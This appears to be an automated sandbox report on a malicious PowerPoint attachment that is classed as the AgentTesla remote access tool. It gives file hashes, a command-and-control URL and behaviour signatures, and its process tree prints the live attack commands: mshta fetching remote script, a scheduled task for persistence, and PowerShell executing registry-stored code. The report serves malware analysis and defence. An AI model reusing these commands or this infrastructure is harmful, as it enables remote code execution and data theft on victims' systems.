Analysis
-
max time kernel
144s -
max time network
145s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
21-04-2021 20:42
General
-
Target
Po 463922900001.ppt
-
Size
77KB
-
MD5
07d27e32b0ab74301b426e77502bcc13
-
SHA1
5f5631b653a61e085650035166d2ab84ab429331
-
SHA256
414dca4ec7dff32fb1d809f021c4865dc1f6249318ffd707b3d5ef72a4cdd7f2
-
SHA512
0a331ddd511ae5a13a9307f48617fc317b283b4378e868e88724abd78b893ea4f5cca6fbf132b22ee61fee63d378d95d5613f1db3b15e14e491d1133513b1026
Score
10/10
Malware Config
Extracted
Family
agenttesla
C2
http://103.133.105.179/808/inc/39b29f468532e0.php
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
AgentTesla Payload 3 IoCs
-
Blocklisted process makes network request 16 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 10 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 29 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Po 463922900001.ppt"1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\mshta.exemshta http://www.j.mp/asdqwpdiiuhjdasnd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@getyournewblog.blogspot.com/p/8.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
9f356c104af437ee32d0a6d901f8828e
SHA1a619d24e2fda51adbc7a3f2709b870c7a1d5a20b
SHA2565770ac3336afe10b9d51656027303351a5a830e96f53c666465df773c7eacf00
SHA51284f115c4432b66329cd5512564170f2621a7d8b59c1dff721bee39faba436886a510641951bb5dfa6da49a5d13ab92b7eaad819959d8c3a4ba5413c0c7ba9dbb
-
memory/1272-65-0x0000000000000000-mapping.dmp
-
memory/1360-71-0x0000000000000000-mapping.dmp
-
memory/1388-72-0x0000000000000000-mapping.dmp
-
memory/1600-73-0x0000000002170000-0x0000000002171000-memory.dmpFilesize
4KB
-
memory/1600-81-0x0000000002880000-0x0000000002882000-memory.dmpFilesize
8KB
-
memory/1600-82-0x000000001AD10000-0x000000001AD22000-memory.dmpFilesize
72KB
-
memory/1600-80-0x0000000002870000-0x0000000002874000-memory.dmpFilesize
16KB
-
memory/1600-69-0x0000000002020000-0x0000000002021000-memory.dmpFilesize
4KB
-
memory/1600-70-0x000000001ADB0000-0x000000001ADB1000-memory.dmpFilesize
4KB
-
memory/1600-78-0x000000001B660000-0x000000001B661000-memory.dmpFilesize
4KB
-
memory/1600-77-0x0000000002920000-0x0000000002921000-memory.dmpFilesize
4KB
-
memory/1600-76-0x0000000002060000-0x0000000002061000-memory.dmpFilesize
4KB
-
memory/1600-74-0x000000001AD30000-0x000000001AD32000-memory.dmpFilesize
8KB
-
memory/1600-75-0x000000001AD34000-0x000000001AD36000-memory.dmpFilesize
8KB
-
memory/1672-83-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1672-84-0x0000000000437DCE-mapping.dmp
-
memory/1672-85-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1672-87-0x0000000004B00000-0x0000000004B01000-memory.dmpFilesize
4KB
-
memory/1672-88-0x0000000004B01000-0x0000000004B02000-memory.dmpFilesize
4KB
-
memory/1676-60-0x00000000745B1000-0x00000000745B5000-memory.dmpFilesize
16KB
-
memory/1676-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1676-61-0x00000000716F1000-0x00000000716F3000-memory.dmpFilesize
8KB
-
memory/1676-66-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1700-67-0x0000000000000000-mapping.dmp
-
memory/1980-63-0x0000000000000000-mapping.dmp
-
memory/1980-64-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmpFilesize
8KB